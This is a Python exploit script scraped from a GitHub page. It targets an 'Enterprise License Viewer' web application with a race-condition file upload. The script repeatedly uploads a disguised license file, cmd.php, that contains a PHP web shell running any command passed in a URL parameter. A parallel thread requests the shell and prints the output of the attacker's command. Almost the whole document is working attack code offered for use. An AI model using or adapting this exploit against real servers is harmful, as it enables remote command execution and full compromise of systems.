Skip to content
Permalink
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
executable file 86 lines (72 sloc) 2.14 KB
#!/usr/bin/python
from threading import Thread
from time import sleep
import requests
import urllib
from bs4 import BeautifulSoup
import sys
result_received=False
if len(sys.argv)!=3:
print "Usage: "+sys.argv[0]+" <url> <cmd>"
print "Example: "+sys.argv[0]+" http://10.1.1.10/tools/lic/ dir"
sys.exit(1)
target=sys.argv[1]
cmd=sys.argv[2]
def writer():
files = {'licenseFile':('cmd.php',"""fakeapp
<?xml version="1.0" encoding="UTF-8"?>
<license>
<registered_for>Name</registered_for>
<customer_mail>user@example.com</customer_mail>
<serial>123-1234-123</serial>
</license>
<?php
$cmd='whoami';
if (isset($_GET['cmd'])) {
$cmd=urldecode($_GET['cmd']);
}
echo '<output>';
echo passthru($cmd);
echo '</output>';
?>
""")}
tryNr=0
sleep(0.5) # Wait for the reader to be started
while not result_received:
#print "Try # "+str(tryNr)+": Sending payload"
sys.stdout.write('.')
sys.stdout.flush()
r=requests.post(target+'/index.php', data={'submit':'submit'},files=files)
tryNr=tryNr+1
if tryNr>2000:
print "It looks like something is not working here... I will stop now"
sys.exit(1);
if __name__ == "__main__":
print "=================================================="
print "= Enterprise License Viewer RCE Exploit ="
print "= A RACE TO THE TARGET ="
print "= ="
print "= Written by Florian Bogner, 03-2018 ="
print "= florian@bogner.sh // https://bogner.sh ="
print "=================================================="
print ""
print "Starting Writer thread (Sends the command to the server)"
writer_thread = Thread(target = writer)
writer_thread.start()
print "Starting Reader ..."
while True:
r = requests.get(target+'/cmd.php?cmd='+urllib.quote_plus(cmd))
if r.status_code != 404:
soup = BeautifulSoup(r.text,"lxml")
output = soup.findAll('output')
if len(output)==1:
result_received=True
print ""
print ""
print "WWWWWIIIIIINNNNN"
print ""
print "Received output:"
print "=================================================="
print output[0].text.strip()
print ""
break;
You can’t perform that action at this time.